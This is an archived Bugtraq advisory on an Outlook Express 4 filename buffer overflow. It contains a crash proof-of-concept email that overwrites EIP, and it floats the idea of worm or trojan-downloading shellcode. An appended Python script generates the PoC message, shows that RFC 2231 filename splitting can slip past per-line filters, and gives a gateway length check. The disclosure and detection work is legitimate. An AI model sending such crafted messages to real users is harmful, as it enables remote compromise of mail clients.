[14882] in bugtraq
Overflow in Outlook Express 4.* - too long filenames with graphic
daemon@ATHENA.MIT.EDU (Ultor)
Fri May 12 12:41:29 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_001C_01BFBC1B.20C9FAF0"
Message-Id: <002801bfbc0a$7feac390$0100a8c0@ultor>
Date: Fri, 12 May 2000 14:05:28 +0200
Reply-To: Ultor <Ultor@HERT.ORG>
From: Ultor <Ultor@HERT.ORG>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_001C_01BFBC1B.20C9FAF0
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
==== APPLICATION AFFECTED
Outlook Express 4.* (5.* is not affected)
==== DESCRIPTION
All attached graphic files are automatically displayed in Outlook Express
while the e-mail is being viewed. The problem is that a long filename with a
*.jpg or *.bmp extension causes an overflow if the filename is longer than 256
characters.
==== EXAMPLE
We need more than 267 characters to overwrite EIP because of the 'C:\TEMP' at
the beginning of the buffer. This causes a small problem for exploitation. Here
is an example of such an e-mail:
------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"
------=_NextPart_000_0008_01BF5479.70140740--
EIP is overwritten here by 'BBBB'.
==== EXPLOITATION
It is a little hard to exploit because the buffer is located at an address
containing a '00' byte, and 'C:\TEMP' is written onto the stack before our
data. You will need some tricks to exploit this. I believe this bug could be
very dangerous if somehow combined with a worm, because you would only have to
view the message to run the exploit. Using shellcode which downloads a trojan
from some URL onto the affected machine would be an interesting idea too.
Greetz to HERT, Lam3rZ, TESO
----------------------
Mark Bialoglowy [Ultor@hert.org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------
------=_NextPart_000_001C_01BFBC1B.20C9FAF0
Content-Type: message/rfc822;
name="crash_oe.eml"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename="crash_oe.eml"
From: "Ultor" <Ultor@hert.org>
To: <Ultor@hert.org>
Subject: What do u want to crash today ?
Date: Sat, 1 Jan 2000 16:58:33 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0008_01BF5479.70140740"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.1
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.1
This is a multi-part message in MIME format.
------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"
------=_NextPart_000_0008_01BF5479.70140740--
------=_NextPart_000_001C_01BFBC1B.20C9FAF0--
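As an added example that is not part of Ultor's post, the following Python
(standard library only) generates a message with the layout of the PoC above,
given a target filename length and the position of the EIP marker, and runs
the check a mail gateway would want: measure each attachment's decoded
filename against the 256-character limit the post names. The addresses, the
boundary string and the dummy base64 body are constructed for the example; the
'C:\TEMP\' prefix used by overflow_bytes() is a rough model of the post's
description, not Outlook Express's actual stack layout. The chunk option emits
the name as RFC 2231 continuation sections (filename*0=, filename*1=, ...) so
the check can be seen measuring the reassembled name rather than one header
line.

```python
"""
Added example, not part of Ultor's post or of Outlook Express: build a
proof-of-concept message of the kind shown in the post and check attachment
filename lengths the way a mail gateway would. Standard library only.
"""
import email

BUFFER_SIZE = 256               # limit stated in the post
PREFIX = "C:\\TEMP\\"           # assumed: the post says 'C:\TEMP' precedes the name
BOUNDARY = "----=_PoC_boundary"  # constructed boundary string


def build_filename(total_len, marker="BBBB", marker_offset=4, ext=".jpg"):
    """Filename of exactly total_len chars: 'A' filler, marker at marker_offset,
    extension last. build_filename(271) has the layout of the post's PoC name."""
    body_len = total_len - len(ext)
    if body_len < marker_offset + len(marker):
        raise ValueError("total_len too small for marker and extension")
    body = ["A"] * body_len
    body[marker_offset:marker_offset + len(marker)] = list(marker)
    return "".join(body) + ext


def disposition_lines(filename, chunk=0):
    """Content-Disposition header lines. chunk=0 gives the single quoted
    parameter used in the post; chunk>0 splits the name into RFC 2231
    continuation sections (filename*0, filename*1, ...) of that many chars."""
    if chunk <= 0:
        return [f'Content-Disposition: attachment; filename="{filename}"']
    pieces = [filename[i:i + chunk] for i in range(0, len(filename), chunk)]
    lines = ["Content-Disposition: attachment;"]
    for n, piece in enumerate(pieces):
        sep = ";" if n < len(pieces) - 1 else ""
        lines.append(f' filename*{n}="{piece}"{sep}')
    return lines


def build_poc_eml(filename, chunk=0):
    """Mirror the post's message: empty text part, then the 'graphic'
    attachment whose Content-Disposition filename is `filename`."""
    lines = [
        "From: sender@example.invalid",        # placeholder addresses
        "To: victim@example.invalid",
        "Subject: What do u want to crash today ?",
        "MIME-Version: 1.0",
        f'Content-Type: multipart/mixed; boundary="{BOUNDARY}"',
        "",
        "This is a multi-part message in MIME format.",
        f"--{BOUNDARY}",
        'Content-Type: text/plain; charset="iso-8859-2"',
        "Content-Transfer-Encoding: 7bit",
        "",
        "",
        f"--{BOUNDARY}",
        'Content-Type: text/plain; name="hert.jpg"',   # as in the post
        "Content-Transfer-Encoding: base64",
        *disposition_lines(filename, chunk),
        "",
        "/9j/4AAQ",                             # constructed dummy base64 body
        f"--{BOUNDARY}--",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def long_attachment_names(raw, limit=BUFFER_SIZE):
    """Return [(length, name)] for every part whose decoded filename is longer
    than limit. get_filename() reassembles RFC 2231 continuation sections, so
    a name split over filename*0/filename*1/... is measured at full length."""
    msg = email.message_from_bytes(raw)
    hits = []
    for part in msg.walk():
        name = part.get_filename()
        if name is not None and len(name) > limit:
            hits.append((len(name), name))
    return hits


def overflow_bytes(filename, prefix=PREFIX, buffer_size=BUFFER_SIZE):
    """Rough model of the post's description: bytes by which prefix + filename
    run past a buffer_size-byte buffer (0 if it fits). Not OE's real layout."""
    return max(0, len(prefix) + len(filename) - buffer_size)


if __name__ == "__main__":
    name = build_filename(271)
    for chunk in (0, 60):
        eml = build_poc_eml(name, chunk)
        print(chunk, long_attachment_names(eml), overflow_bytes(name))
```

Whether Outlook Express 4 reassembles RFC 2231 sections is not something the
post says; the split form is there to show that a filter has to measure the
name the parser hands back, not the length of any single header line, or a
long name folded that way walks straight past a per-line check.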